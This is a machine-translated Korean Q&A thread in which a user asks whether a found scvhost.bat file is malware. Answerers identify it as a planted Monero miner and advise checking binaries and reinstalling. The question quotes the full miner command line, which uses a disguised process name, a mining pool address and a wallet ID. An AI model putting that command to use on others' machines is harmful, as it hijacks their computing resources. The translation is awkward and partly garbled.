cryptonight가 포함 된이 scvhost.bat가 바이러스입니까?

scvhost.bat라는이 .bat 파일을 찾았습니다. 파일에는 다음과 같은 내용이 들어 있습니다.

scvhost -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 48uh2mrdkdq2tQysfkX2hZDi2hkRua4GX13EqY8djJ5xNXhez7baztVWbwXa34vUMveKAzAiA4j8xgUi29TpKXpm42jqV6H.microSf -p MXXXXXX-t 02

이것은 바이러스 (정보 등을 훔치기위한)입니까 아니면 심은 광부입니까? 암호화 통화에 익숙해 져서 stratum위의 파일에서 언급 된 통화입니다.

— 초보자 프로그래머
소스

이것은 실제로 광부 인 것 같습니다. 암호화 통화를 직접 사용한다는 점을 감안할 때, 채굴하는 경우 실제로 채굴에 사용하는 것이 아닌지 확인하십시오. .bat 확장자를 다른 것으로 바꾸면 재부팅 후에도 정상적으로 마이닝 할 수 있는지 확인할 수 있습니다. 내가이 파일에 대해 이상하게 생각하는 것은 scvhost가 실행하는 이름과 bat 파일이라는 점을 감안할 때 일반적으로 호출된다는 것입니다. 일반적으로 루프가 발생합니다.

— LPChip

@VirtualAnomaly 나는 당신이 여기에 언급 된 sCVhost로 sVChost를 착각했다고 생각합니다. 예, svchost가 서비스 호스팅의 메커니즘이라는 것을 잘 알고 있습니다.

— LPChip

@LPChip 내 사과, 당신은 맞습니다, 나는 착각했습니다.

— 가상 변칙

누군가 스타 크래프트를 너무 많이 했어

— 코드 InChaos

@lucidbrot SCV는 게임 종족 (지형) 중 하나의 "빌더"단위이며,이 경우 "공간 구성 차량"을 의미합니다.

— Aaron

특히 매개 변수에 마이닝 풀의 URL이 포함되어 있기 때문에 이것은 일종의 광부 인 것 같습니다. 그러나 바이너리에 무엇이 있는지 확인해야합니다. 시스템에서 찾은 바이너리의 체크섬을 광부의 개발 팀이 만든 릴리스와 비교하는 것이 좋습니다. 그들이 다르다면; 시스템이 안전하지 않은 것으로 간주하십시오.

또 다른 문제는이 광부에 대해 (아마도 많은 CPU를 사용했기 때문에) 알았지 만 시스템에서 다른 일이 발생했는지 전혀 모른다는 것입니다. 침입자가 광부를 발사 할 수 있다면 다른 것도 발사 할 수 있습니다. 어쨌든 백업에서 복구하거나 새로 설치하는 것이 좋습니다.

— 음탁
소스